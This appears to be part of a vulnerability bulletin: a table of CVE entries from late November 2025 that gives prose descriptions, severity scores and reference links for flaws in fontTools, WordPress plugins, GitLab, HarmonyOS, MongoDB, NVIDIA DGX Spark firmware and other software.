| fonttools--fonttools | fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2. | 2025-11-29 | 6.3 | CVE-2025-66034 | https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32 |
| galdub--Folders Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager | The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a misconfigured capability check on the 'wcp_change_post_folder' function in all versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to move arbitrary folder contents to arbitrary folders. | 2025-11-27 | 4.3 | CVE-2025-12971 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3845071-8419-4bb2-b22d-f9ae22fb7d6a?source=cve https://research.cleantalk.org/cve-2025-12971/ https://plugins.trac.wordpress.org/browser/folders/trunk/includes/folders.class.php#L3291 https://plugins.trac.wordpress.org/changeset/3402986/ |
| geoserver--geoserver | GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.25.0, a reflected cross-site scripting (XSS) vulnerability exists in the WMS GetFeatureInfo HTML output format that enables a remote attacker to execute arbitrary JavaScript code in a victim's browser through specially crafted SLD_BODY parameters. This issue has been patched in version 2.25.0. | 2025-11-25 | 6.1 | CVE-2025-21621 | https://github.com/geoserver/geoserver/security/advisories/GHSA-w66h-j855-qr72 https://github.com/geoserver/geoserver/pull/7406 https://github.com/geoserver/geoserver/commit/dc9ff1c726dd73c884437a123b4ad72b19383c7d https://osgeo-org.atlassian.net/browse/GEOS-11297 |
| getformwork--formwork | Formwork is a flat file-based Content Management System (CMS). Prior to version 2.2.0, inserting unsanitized data into the blog tag field results in stored cross-site scripting (XSS). Any user with credentials to the Formwork CMS who accesses or edits an affected blog post will have attacker-controlled script executed in their browser. The issue is persistent and impacts privileged administrative workflows. This issue has been patched in version 2.2.0. | 2025-11-25 | 6.5 | CVE-2025-65956 | https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj https://github.com/getformwork/formwork/pull/791 https://github.com/getformwork/formwork/commit/4abcd60ae7692b46d316f956b0b20fb85336f3b2 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that under specific conditions could have allowed an unauthenticated user to join arbitrary organizations by changing headers on some requests. | 2025-11-26 | 6.5 | CVE-2025-12653 | GitLab Issue #579372 HackerOne Bug Bounty Report #3370245 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.3 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user with specific permissions to cause a denial of service condition through HTTP response processing. | 2025-11-26 | 6.5 | CVE-2025-7449 | GitLab Issue #554938 HackerOne Bug Bounty Report #3215054 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.7 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user to view information from security reports under certain configuration conditions. | 2025-11-26 | 4.3 | CVE-2025-6195 | GitLab Issue #549937 HackerOne Bug Bounty Report #3155693 |
| gungorbudak--Shouty | The Shouty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the shouty shortcode in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12712 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28252c89-a2db-441a-93e6-f051f3649fea?source=cve https://plugins.trac.wordpress.org/browser/shouty/tags/0.2.1/shouty.php#L138 https://plugins.trac.wordpress.org/browser/shouty/tags/0.2.1/shouty.php#L139 |
| gwendydd--Chamber Dashboard Business Directory | The Chamber Dashboard Business Directory plugin for WordPress is vulnerable to unauthorized data export due to a missing capability check on the cdash_watch_for_export() function in all versions up to, and including, 3.3.11. This makes it possible for unauthenticated attackers to export business directory information, including sensitive business details. | 2025-11-25 | 5.3 | CVE-2025-13414 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1896885a-a104-464a-bb57-2c3c73ff9415?source=cve https://plugins.trac.wordpress.org/browser/chamber-dashboard-business-directory/trunk/options.php#L850 https://plugins.trac.wordpress.org/browser/chamber-dashboard-business-directory/tags/3.3.11/options.php#L850 |
| Huawei--HarmonyOS | Permission control vulnerability in the print module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 6.2 | CVE-2025-58294 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Identity authentication bypass vulnerability in the Gallery app. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 6.2 | CVE-2025-58305 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the screen recording framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 6.4 | CVE-2025-58307 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the startup recovery module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 6.8 | CVE-2025-58309 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Vulnerability of accessing invalid memory in the component driver module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 6.6 | CVE-2025-58314 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the USB driver module. Impact: Successful exploitation of this vulnerability will affect availability and confidentiality. | 2025-11-28 | 5.8 | CVE-2025-58311 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the App Lock module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 5.1 | CVE-2025-58312 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Wi-Fi module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 5.5 | CVE-2025-58315 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 5.1 | CVE-2025-64311 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 5.3 | CVE-2025-64313 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 4.9 | CVE-2025-58304 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 4.9 | CVE-2025-64312 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Configuration defect vulnerability in the file management module. Impact: Successful exploitation of this vulnerability may affect app data confidentiality and integrity. | 2025-11-28 | 4.4 | CVE-2025-64315 | https://consumer.huawei.com/cn/support/bulletinlaptops/2025/11/ |
| humhub--cfiles | Files is a module for managing files inside spaces and user profiles. Prior to versions 0.16.11 and 0.17.2, insufficient authorization checks allow non-member users to create new folders, upload files, and download files as a ZIP archive in public spaces. Private spaces are not affected. This issue has been patched in versions 0.16.11 and 0.17.2. | 2025-11-25 | 5.4 | CVE-2025-65963 | https://github.com/humhub/cfiles/security/advisories/GHSA-rv2x-7qwp-2hf4 https://github.com/humhub/cfiles/commit/75698f8e8f360cea470f0e9f264015b697ab4c09 |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 2025-11-24 | 5.9 | CVE-2025-36150 | https://www.ibm.com/support/pages/node/7252019 |
| IBM--Sterling B2B Integrator | IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could reveal sensitive server IP configuration information to an unauthorized user. | 2025-11-24 | 5.3 | CVE-2025-36112 | https://www.ibm.com/support/pages/node/7252197 |
| Iteras--Peppol-py | Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host. | 2025-11-28 | 5 | CVE-2025-66371 | https://github.com/iterasdev/peppol-py/pull/16 https://github.com/iterasdev/peppol-py/releases/tag/1.1.1 |
| itsourcecode--Student Information System | A vulnerability was identified in itsourcecode Student Information System 1.0. Affected by this vulnerability is an unknown functionality of the file /schedule_edit1.php. Such manipulation of the argument schedule_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-11-24 | 6.3 | CVE-2025-13581 | VDB-333345 (itsourcecode Student Information System schedule_edit1.php sql injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #699516 (itsourcecode Student Information System V1.0 SQL Injection); https://github.com/ltranquility/CVE/issues/14 https://itsourcecode.com/ |
| karthiksg--Inline frame Iframe | The Inline frame - Iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedsite' shortcode in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-25 | 6.4 | CVE-2025-12645 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ceda1e49-4e65-4038-9207-ef4647838f53?source=cve https://plugins.trac.wordpress.org/browser/inline-frame-iframe/tags/0.1/iframe.php#L76 |
| KDE--Krita | In KDE Krita before 5.2.13, loading a manipulated TGA file could result in a heap-based buffer overflow in plugins/impex/tga/kis_tga_import.cpp (aka KisTgaImport). Control flow proceeds even when a number of pixels becomes negative. | 2025-11-26 | 6.7 | CVE-2025-59820 | https://invent.kde.org/graphics/krita/ https://kde.org/info/security/advisory-20250929-1.txt https://invent.kde.org/graphics/krita/-/commit/6d3651ac4df88efb68e013d21061de9846e83fe8 |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, this vulnerability could allow an external attacker to gain access to log information from the system by tricking an administrator into browsing a specifically crafted fake page of Kiteworks MFT. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.8 | CVE-2025-53897 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-cxwc-7899-3h4m |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.5 | CVE-2025-53900 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-gjq3-8v6p-2h6h |
| kiteworks--security-advisories | Kiteworks is a private data network (PDN). Prior to version 9.1.0, improper input validation when managing roles of a shared folder could unexpectedly elevate another user's permissions on the share. This issue has been patched in version 9.1.0. | 2025-11-29 | 6.3 | CVE-2025-53939 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-hpf5-6376-2565 |
| kivitendo--kivitendo | Kivitendo before 3.9.2 allows XXE injection. By uploading an electronic invoice in the ZUGFeRD format, it is possible to read and exfiltrate files from the server's filesystem. | 2025-11-28 | 5 | CVE-2025-66370 | https://github.com/kivitendo/kivitendo-erp/blob/fd3f993fc731cbcaa5eb87d55df7c82df4df9c09/doc/changelog https://github.com/kivitendo/kivitendo-erp/commit/1286dee72f9919166178d0cdb5f52f13b0f7d4de https://github.com/kivitendo/kivitendo-erp/commit/f6ba56bd8d22a428534057589baace6b7bfdf2e9 https://blog.kivitendo.de/?p=1415 |
| liquidthemes--AI Engine for WordPress: ChatGPT, GPT Content Generator | The AI Engine for WordPress: ChatGPT, GPT Content Generator plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1. This is due to insufficient validation of user-supplied file paths in the 'lqdai_update_post' AJAX endpoint and the use of file_get_contents() with user-controlled URLs without protocol restrictions in the insert_image() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-11-25 | 6.5 | CVE-2025-13380 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0abace-9bf6-4ef9-a9b8-7efffbf25628?source=cve https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L83 https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L315 https://plugins.trac.wordpress.org/browser/liquid-chatgpt/tags/1.0.1/liquid-chatgpt.php#L423 https://github.com/d0n601/CVE-2025-13380 https://ryankozak.com/posts/cve-2025-13380/ |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order_by' parameter in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-27 | 6.1 | CVE-2025-13525 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01cd3631-93fb-4016-baa4-8ea11b21acec?source=cve https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L38 https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L39 https://wordpress.org/plugins/wpdirectorykit/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3401078%40wpdirectorykit&new=3401078%40wpdirectorykit&sfp_email=&sfph_mail= |
| lKinderBueno--Streamity Xtream IPTV Player | A vulnerability was found in lKinderBueno Streamity Xtream IPTV Player up to 2.8. The impacted element is an unknown function of the file public/proxy.php. Performing manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been made public and could be used. Upgrading to version 2.8.1 is sufficient to resolve this issue. The patch is named c70bfb8d36b47bfd64c5ec73917e1d9ddb97af92. It is suggested to upgrade the affected component. | 2025-11-24 | 6.3 | CVE-2025-13588 | VDB-333352 (lKinderBueno Streamity Xtream IPTV Player proxy.php server-side request forgery); CTI Indicators (IOB, IOC, IOA); Submit #687573 (lKinderBueno Streamity Xtream IPTV Web player 2.8 Server-Side Request Forgery); https://github.com/lakshayyverma/CVE-Discovery/blob/main/Streamity.md https://github.com/lKinderBueno/Streamity-Xtream-IPTV-Web-player/commit/c70bfb8d36b47bfd64c5ec73917e1d9ddb97af92 https://github.com/lKinderBueno/Streamity-Xtream-IPTV-Web-player/releases/tag/v2.8.1 |
| lyrathemes--Social Images Widget | The Social Images Widget plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'options_update' function in all versions up to, and including, 2.1. This makes it possible for unauthenticated attackers to delete the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-25 | 5.3 | CVE-2025-13386 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95ab7473-e368-47ad-a8a0-0efbdafce562?source=cve https://plugins.trac.wordpress.org/browser/social-images-widget/tags/2.1/class-social-images-widget-settings.php#L44 https://plugins.trac.wordpress.org/browser/social-images-widget/trunk/class-social-images-widget-settings.php#L44 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164. | 2025-11-29 | 6.5 | CVE-2025-65113 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-9f8v-vph8-pq6q https://github.com/MacWarrior/clipbucket-v5/commit/a83b807e592f85d98f1f156bd3cbb1ffcc230233 |
| mahabubs--YouTube Subscribe | The YouTube Subscribe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-25 | 4.4 | CVE-2025-12025 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9996cdc7-4d97-4b27-b697-09bbdbcd865d?source=cve https://wordpress.org/plugins/easy-youtube-subscribe/ https://plugins.trac.wordpress.org/browser/easy-youtube-subscribe/tags/3.0.0/includes/sm-youtube-subscription-shortcode.php#L242 https://plugins.trac.wordpress.org/browser/easy-youtube-subscribe/tags/3.0.0/includes/sm-youtube-subscription-shortcode.php#L246 |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to restrict team email addresses to Team Admins only, which allows any authenticated user to view team email addresses via the GET /api/v4/channels/{channel_id}/common_teams endpoint. | 2025-11-27 | 4.3 | CVE-2025-12559 | https://mattermost.com/security-updates |
| MISP--MISP | app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin. | 2025-11-28 | 4.1 | CVE-2025-66386 | https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27 |
| Mitsubishi Electric Corporation--GX Works2 | Cleartext Storage of Sensitive Information Vulnerability in GX Works2 all versions allows an attacker to disclose credential information stored in plaintext from project files. As a result, the attacker may be able to open project files protected by user authentication using disclosed credential information, and obtain or modify project information. | 2025-11-27 | 5.5 | CVE-2025-3784 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-016_en.pdf https://jvn.jp/vu/JVNVU95288056/ |
| MongoDB Inc.--MongoDB Server | Inconsistent object size validation in time series processing logic may result in later processing of oversized BSON documents leading to an assert failing and process termination. This issue impacts MongoDB Server v7.0 versions prior to 7.0.26, v8.0 versions prior to 8.0.16 and MongoDB server v8.2 versions prior to 8.2.1. | 2025-11-25 | 6.5 | CVE-2025-13507 | https://jira.mongodb.org/browse/SERVER-108565 |
| MongoDB Inc.--MongoDB Server | MongoDB Server may experience an invariant failure during batched delete operations when handling documents. The issue arises when the server mistakenly assumes the presence of multiple documents in a batch based solely on document size exceeding BSONObjMaxSize. This issue affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.13, and MongoDB Server v8.1 versions prior to 8.1.2 | 2025-11-25 | 6.5 | CVE-2025-13644 | https://jira.mongodb.org/browse/SERVER-101180 |
| MongoDB Inc.--MongoDB Server | Clients may successfully perform a TLS handshake with a MongoDB server despite presenting a client certificate not aligning with the documented Extended Key Usage (EKU) requirements. A certificate that specifies extendedKeyUsage but is missing extendedKeyUsage = clientAuth may still be successfully authenticated via the TLS handshake as a client. This issue is specific to MongoDB servers running on Windows or Apple as the expected validation behavior functions correctly on Linux systems. Additionally, MongoDB servers may successfully establish egress TLS connections with servers that present server certificates not aligning with the documented Extended Key Usage (EKU) requirements. A certificate that specifies extendedKeyUsage but is missing extendedKeyUsage = serverAuth may still be successfully authenticated via the TLS handshake as a server. This issue is specific to MongoDB servers running on Apple as the expected validation behavior functions correctly on both Linux and Windows systems. This vulnerability affects MongoDB Server v7.0 versions prior to 7.0.26, MongoDB Server v8.0 versions prior to 8.0.16 and MongoDB Server v8.2 versions prior to 8.2.2 | 2025-11-25 | 4.2 | CVE-2025-12893 | https://jira.mongodb.org/browse/SERVER-105783 |
| n/a--Scada-LTS | A vulnerability was identified in Scada-LTS up to 2.7.8.1. Affected is the function Common.getHomeDir of the file br/org/scadabr/vo/exporter/ZIPProjectManager.java of the component Project Import. Such manipulation leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 6.3 | CVE-2025-13791 | VDB-333795 (Scada-LTS Project Import ZIPProjectManager.java Common.getHomeDir path traversal); CTI Indicators (IOB, IOC, TTP, IOA); Submit #690873 (SCADA-LTS Project Scada-LTS <= commit 1cfaed4b35117e4871bc3dfeae073f61d8e3bb3d Path traversal / Zip Slip leading to arbitrary file write); https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md#proof-of-concept |
| n/a--Scada-LTS | A vulnerability was determined in Scada-LTS up to 2.7.8.1. This impacts an unknown function. This manipulation causes cross-site request forgery. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13790 | VDB-333794 (Scada-LTS cross-site request forgery); CTI Indicators (IOB, IOC); Submit #690871 (SCADA-LTS Project Scada-LTS <=1cfaed4b35117e4871bc3dfeae073f61d8e3bb3d Cross-Site Request Forgery (CSRF)); https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-CSRF-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-CSRF-1/report.md#proof-of-concept |
| n/a--ZenTao | A vulnerability was found in ZenTao up to 21.7.6-8564. This affects the function makeRequest of the file module/ai/model.php. The manipulation of the argument Base results in server-side request forgery. The attack can be launched remotely. The exploit has been made public and could be used. Upgrading to version 21.7.6 mitigates this issue. It is suggested to upgrade the affected component. | 2025-11-30 | 6.3 | CVE-2025-13789 | VDB-333793 (ZenTao model.php makeRequest server-side request forgery); CTI Indicators (IOB, IOC, IOA); Submit #690728 (Zentao PMS <=21.7.6-85642 SSRF); https://github.com/ez-lbz/ez-lbz.github.io/issues/2 https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issuecomment-3540247346 https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issue-3598317459 https://www.zentao.net/extension-viewext-6.html |
| n/a--ZenTao | A flaw has been found in ZenTao up to 21.7.6-8564. The affected element is the function file::delete of the file module/file/control.php of the component File Handler. Executing manipulation of the argument fileID can lead to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 21.7.7 is sufficient to fix this issue. You should upgrade the affected component. | 2025-11-30 | 5.4 | CVE-2025-13787 | VDB-333791 (ZenTao File control.php delete privileges management); CTI Indicators (IOB, IOC, TTP, IOA); Submit #689892 (Zentao PMS <=21.7.6-85642 Privilege Escalation); https://github.com/ez-lbz/ez-lbz.github.io/issues/1 https://github.com/ez-lbz/ez-lbz.github.io/issues/1#issuecomment-3540423868 https://www.zentao.net/extension-buyext-1601-download.html |
| nextendweb--Nextend Social Login and Register | The Nextend Social Login and Register plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.21. This is due to missing or incorrect nonce validation on the 'unlinkUser' function. This makes it possible for unauthenticated attackers to unlink the user's social login via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-28 | 4.3 | CVE-2025-13737 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c6b747e-d267-4fd3-a4fd-022aa657c796?source=cve https://plugins.trac.wordpress.org/browser/nextend-facebook-connect/tags/3.1.21/includes/provider.php#L772 https://plugins.trac.wordpress.org/changeset/3404174/nextend-facebook-connect/trunk/includes/provider.php |
| nmedia--Admin and Customer Messages After Order for WooCommerce: OrderConvo | The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID. | 2025-11-25 | 5.3 | CVE-2025-13389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9149d2c6-b6c7-430d-8886-c8c5de483220?source=cve https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L142 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L142 |
| nmedia--Admin and Customer Messages After Order for WooCommerce: OrderConvo | The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters. | 2025-11-25 | 4.3 | CVE-2025-13452 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c1dd87c-cc28-43b3-8378-4583dc6de195?source=cve https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L56 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L56 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L113 https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L113 |
| nmedia--Frontend File Manager Plugin | The Frontend File Manager Plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.4. This is due to the plugin not validating file ownership before processing file rename requests in the '/wpfm/v1/file-rename' REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to rename files uploaded by other users via the 'fileid' parameter. | 2025-11-25 | 4.3 | CVE-2025-13382 | https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d5feb-2ae9-44b8-90b5-9fc67226855a?source=cve https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L20 https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L52 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 6.7 | CVE-2025-33190 | https://nvd.nist.gov/vuln/detail/CVE-2025-33190 https://www.cve.org/CVERecord?id=CVE-2025-33190 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in OSROOT firmware, where an attacker could cause an invalid memory read. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 5.7 | CVE-2025-33191 | https://nvd.nist.gov/vuln/detail/CVE-2025-33191 https://www.cve.org/CVERecord?id=CVE-2025-33191 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an arbitrary memory read. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 5.7 | CVE-2025-33192 | https://nvd.nist.gov/vuln/detail/CVE-2025-33192 https://www.cve.org/CVERecord?id=CVE-2025-33192 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause improper validation of integrity. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 5.7 | CVE-2025-33193 | https://nvd.nist.gov/vuln/detail/CVE-2025-33193 https://www.cve.org/CVERecord?id=CVE-2025-33193 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause improper processing of input data. A successful exploit of this vulnerability might lead to information disclosure or denial of service. | 2025-11-25 | 5.7 | CVE-2025-33194 | https://nvd.nist.gov/vuln/detail/CVE-2025-33194 https://www.cve.org/CVERecord?id=CVE-2025-33194 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause unexpected memory buffer operations. A successful exploit of this vulnerability might lead to data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 4.4 | CVE-2025-33195 | https://nvd.nist.gov/vuln/detail/CVE-2025-33195 https://www.cve.org/CVERecord?id=CVE-2025-33195 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 4.4 | CVE-2025-33196 | https://nvd.nist.gov/vuln/detail/CVE-2025-33196 https://www.cve.org/CVERecord?id=CVE-2025-33196 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service. | 2025-11-25 | 4.3 | CVE-2025-33197 | https://nvd.nist.gov/vuln/detail/CVE-2025-33197 https://www.cve.org/CVERecord?id=CVE-2025-33197 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
